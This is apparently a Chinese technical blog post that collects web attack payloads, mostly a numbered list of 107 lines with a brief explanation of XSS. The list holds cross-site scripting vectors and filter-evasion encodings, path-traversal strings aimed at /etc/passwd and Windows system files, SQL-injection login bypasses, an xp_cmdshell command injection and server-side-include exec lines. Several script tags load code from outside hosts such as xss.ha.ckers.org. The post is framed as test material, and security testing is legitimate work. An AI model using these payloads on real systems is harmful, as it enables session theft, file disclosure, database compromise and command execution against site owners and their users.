XSS跨站测试代码大全

最新推荐文章于 2024-06-11 14:40:18 发布
最新推荐文章于 2024-06-11 14:40:18 发布
阅读量6.2k 收藏 2
点赞数 1
分类专栏: 漏洞异常
  1. '><script>alert(document.cookie)</script>  
  2. ='><script>alert(document.cookie)</script>  
  3. <script>alert(document.cookie)</script>  
  4. <script>alert(vulnerable)</script>  
  5. %3Cscript%3Ealert('XSS')%3C/script%3E  
  6. <script>alert('XSS')</script>  
  7. <img src="javascript:alert('XSS')">  
  8. %0a%0a<script>alert(\"Vulnerable\")</script>.jsp  
  9. %22%3cscript%3ealert(%22xss%22)%3c/script%3e  
  10. %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd  
  11. %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini  
  12. %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e  
  13. %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e  
  14. %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html  
  15. %3f.jsp  
  16. %3f.jsp  
  17. <script>alert('Vulnerable');</script>  
  18. <script>alert('Vulnerable')</script>  
  19. ?sql_debug=1  
  20. a%5c.aspx  
  21. a.jsp/<script>alert('Vulnerable')</script>  
  22. a/  
  23. a?<script>alert('Vulnerable')</script>  
  24. "><script>alert('Vulnerable')</script>  
  25. ';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&  
  26. %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  27. %3Cscript%3Ealert(document. domain);%3C/script%3E&  
  28. %3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=  
  29. 1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=  
  30. http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/etc/passwd  
  31. ..\..\..\..\..\..\..\..\windows\system.ini  
  32. \..\..\..\..\..\..\..\..\windows\system.ini  
  33. '';!--"<XSS>=&{()}  
  34. <IMG src="javascript:alert('XSS');">  
  35. <IMG src=javascript:alert('XSS')>  
  36. <IMG src=JaVaScRiPt:alert('XSS')>  
  37. <IMG src=JaVaScRiPt:alert("XSS")>  
  38. <IMG src=javascript:alert('XSS')>  
  39. <IMG src=javascript:alert('XSS')>  
  40. <IMG src=javascript:alert('XSS')>  
  41. <IMG src="jav ascript:alert('XSS');">  
  42. <IMG src="jav ascript:alert('XSS');">  
  43. <IMG src="jav ascript:alert('XSS');">  
  44. "<IMG src=java\0script:alert(\"XSS\")>";' > out  
  45. <IMG src=" javascript:alert('XSS');">  
  46. <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>  
  47. <BODY BACKGROUND="javascript:alert('XSS')">  
  48. <BODY ONLOAD=alert('XSS')>  
  49. <IMG DYNSRC="javascript:alert('XSS')">  
  50. <IMG LOWSRC="javascript:alert('XSS')">  
  51. <BGSOUND src="javascript:alert('XSS');">  
  52. <br size="&{alert('XSS')}">  
  53. <LAYER src="http://xss.ha.ckers.org/a.js"></layer>  
  54. <LINK REL="stylesheet" href="javascript:alert('XSS');">  
  55. <IMG src='vbscript:msgbox("XSS")'>  
  56. <IMG src="mocha:[code]">  
  57. <IMG src="livescript:[code]">  
  58. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">  
  59. <IFRAME src=javascript:alert('XSS')></IFRAME>  
  60. <FRAMESET><FRAME src=javascript:alert('XSS')></FRAME></FRAMESET>  
  61. <TABLE BACKGROUND="javascript:alert('XSS')">  
  62. <DIV STYLE="background-image: url(javascript:alert('XSS'))">  
  63. <DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');">  
  64. <DIV STYLE="width: expression(alert('XSS'));">  
  65. <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>  
  66. <IMG STYLE='xss:expre\ssion(alert("XSS"))'>  
  67. <STYLE TYPE="text/javascript">alert('XSS');</STYLE>  
  68. <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A class="XSS"></A>  
  69. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>  
  70. <BASE href="javascript:alert('XSS');//">  
  71. getURL("javascript:alert('XSS')")  
  72. a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);  
  73. <XML src="javascript:alert('XSS');">  
  74. "> <BODY ONLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"  
  75. <SCRIPT src="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>  
  76. <IMG src="javascript:alert('XSS')"  
  77. <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'"-->  
  78. <IMG src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">  
  79. <SCRIPT a=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>  
  80. <SCRIPT =">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>  
  81. <SCRIPT a=">" '' src="http://xss.ha.ckers.org/a.js"></SCRIPT>  
  82. <SCRIPT "a='>'" src="http://xss.ha.ckers.org/a.js"></SCRIPT>  
  83. <SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://xss.ha.ckers.org/a.js"></SCRIPT>  
  84. <A href=http://www.gohttp://www.google.com/ogle.com/>link</A>  
  85. admin'--  
  86. ' or 0=0 --  
  87. " or 0=0 --  
  88. or 0=0 --  
  89. ' or 0=0 #  
  90. " or 0=0 #  
  91. or 0=0 #  
  92. ' or 'x'='x  
  93. " or "x"="x  
  94. ') or ('x'='x  
  95. ' or 1=1--  
  96. " or 1=1--  
  97. or 1=1--  
  98. ' or a=a--  
  99. " or "a"="a  
  100. ') or ('a'='a  
  101. ") or ("a"="a  
  102. hi" or "a"="a  
  103. hi" or 1=1 --  
  104. hi' or 1=1 --  
  105. hi' or 'a'='a  
  106. hi') or ('a'='a  
  107. hi") or ("a"="a

XSS攻击:跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆。故将跨站脚本攻击缩写为XSS。XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin policy)。这种类型的漏洞由于被骇客用来编写危害性更大的phishing攻击而变得广为人知。对于跨站脚本攻击,黑客界共识是:跨站脚本攻击是新型的“缓冲区溢出攻击“,而JavaScript是新型的“ShellCode”。

下面是几种常用的XSS攻击代码:

(1)普通的XSS JavaScript注入
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2)IMG标签XSS使用JavaScript命令
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3)IMG标签无分号无引号
<IMG SRC=javascript:alert(‘XSS’)>

(4)IMG标签大小写不敏感
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>

(5)HTML编码(必须有分号)
<IMG SRC=javascript:alert(“XSS”)>

(6)修正缺陷IMG标签
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>

(7)formCharCode标签(计算器)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8)UTF-8的Unicode编码(计算器)
<IMG SRC=jav..省略..S')>

(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
<IMG SRC=jav..省略..S')>

(10)十六进制编码也是没有分号(计算器)
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>

(11)嵌入式标签,将Javascript分开
<IMG SRC=”jav ascript:alert(‘XSS’);”>

(12)嵌入式编码标签,将Javascript分开
<IMG SRC=”jav ascript:alert(‘XSS’);”>

(13)嵌入式换行符
<IMG SRC=”jav ascript:alert(‘XSS’);”>

(14)嵌入式回车
<IMG SRC=”jav ascript:alert(‘XSS’);”>

(15)嵌入式多行注入JavaScript,这是XSS极端的例子
<IMG SRC=”javascript:alert(‘XSS‘)”>

(16)解决限制字符(要求同页面)
<script>z=’document.’</script>
<script>z=z+’write(“‘</script>


Xysoul
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss测试代码大全javascript中的xss过滤
03-24
xss测试代码大全
xss跨站脚本攻击-运维安全详细笔记
06-30
xss跨站脚本攻击是指攻击者利用网站没有对用户提交代码进行转义处理或者过滤不足的缺点,进而添加一些新代码,嵌入到Web页面中,使得其他用户访问都会执行相应的嵌入代码,从而盗取用户资料,利用用户身份进行某些...
XSS测试代码大全
夕慕慕的博客
11-14 1万+
XSS测试代码大全 主要根据各种脚本及标签,将之转换成Unicode编码后输入。 '>alert(document.cookie) ='>alert(document.cookie) alert(document.cookie) alert(vulnerable) %3Cscript%3Ealert('XSS')%3C/script%3E alert('XSS') %0a
XSS攻击绕过方法大全,XSS攻击技巧,收集100种绕过方法分享(2024最新)_xss绕过
最新发布
weixin_42340783的博客
06-11 1343
尽管许多网站实施了输入过滤措施来防止跨站脚本(XSS)攻击,但在特定条件下,经过精心编码的脚本仍有可能实施XSS注入。本文旨在为专业的安全测试人员提供一个跨站脚本漏洞的检测指南。
XSS测试代码
Tianyi_liang的博客
03-13 1159
XSS测试代码收集
XSS 跨站测试代码大全2
LIVE
11-07 1285
0x01 XSS介绍 1. XSS分类 (1) 反射型XSS、 (2)存储型XSS、 (3)Dom型XSS、 (4) 通用型XSS、(全称Universal Cross-Site Scripting,翻译过来就是通用型XSS 简称UXSS) (5) 突变型XSS ( 介绍: mXS()突变 XSS) 是当不可信数据在 DOM 的 innerHTML 属性的上下文被处理并通过浏览器发生突变,...
安全测试xss攻击通用测试用例
测试开发
04-12 734
安全测试,测xss攻击,一个通用case测出一类问题。测试开发同学可以关注一下
xss跨站脚本攻击与预防
11-04
**XSS跨站脚本攻击详解** XSS(Cross Site Scripting)跨站脚本攻击是一种常见的网络安全漏洞,它允许攻击者在用户浏览器上执行恶意脚本,从而获取敏感信息或者操控用户的行为。这种攻击主要发生在Web应用中,攻击...
ThinkPHP2.x防范XSS跨站攻击的方法
12-19
XSS(Cross-Site Scripting)跨站脚本攻击是一种常见的网络安全漏洞,它允许攻击者在用户浏览器上执行恶意脚本。在ThinkPHP2.x框架中,存在一个可能导致XSS攻击的风险,即当URL参数中包含恶意脚本时,ThinkPHP的异常...
XSS跨站脚本gj剖析与防御
05-18
XSS跨站脚本攻击虽然危险,但通过采取上述防御措施,可以显著降低其威胁。对于开发人员来说,了解XSS的原理和防范方法是确保Web应用安全的重要一步。同时,持续更新安全知识,关注新的攻击手段和防御技术,也是抵御...
PHP、Apache环境中部署xsslabs(XSS跨站脚本攻击靶场)
01-08
PHP与Apache环境中部署xsslabs(XSS跨站脚本攻击靶场)是开发者和安全测试人员进行XSS攻击练习的重要环境。xsslabs是一款开源的XSS 漏洞靶场工具,由PHP代码编写而成,需要PHP和Apache环境运行。下面是部署xsslabs...
XSS测试代码大全————
11-03
XSS测试代码 安全测试 XSS测试代码大全
XSS测试语句大全
08-07
跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。
XSS测试payload
09-19
XSS测试payload,收集了简单的XSS测试用例,较具有实用性。
XSS攻击检测
01-22
XSS攻击检测代码,删除bin生成的class,直接使用src加载.java 就好了,开发采用的myeclipse,使用其他工具的注意修改,
Web安全:XSS漏洞的测试(防止 黑客利用此漏洞.)
热门推荐
网络安全领域___专研者.
03-17 1万+
XSS漏洞的概括: XSS又叫CSS(Cross Site Script)跨站脚本攻击,指的是攻击者在Web页面,插入恶意JS代码,当用户浏览该页之时,嵌入其中JS代码就会被执行,从而达到攻击的目的.(包含:收集用户的Cookie,添加账号,修改密码,提高用户权限等等.)
xss测试代码
11-16 186
1.标准的xss漏洞测试代码<script>alert('xss')</script>2.img图片标记属性跨站攻击代码<img src="javascript:alert(/xss/)"></img><img dynsrc="javascript:alert('xss')">3.无需"<>",利用html标记事件属...
理解与防范XSS跨站攻击:从基础到实战
XSS跨站攻击课程.pdf” XSS(Cross-Site Scripting)是一种常见的网络...这门XSS跨站攻击课程旨在帮助学员理解XSS攻击的全貌,提高对这种威胁的认识,掌握检测和防止XSS漏洞的技能,以保护Web应用程序免受恶意攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值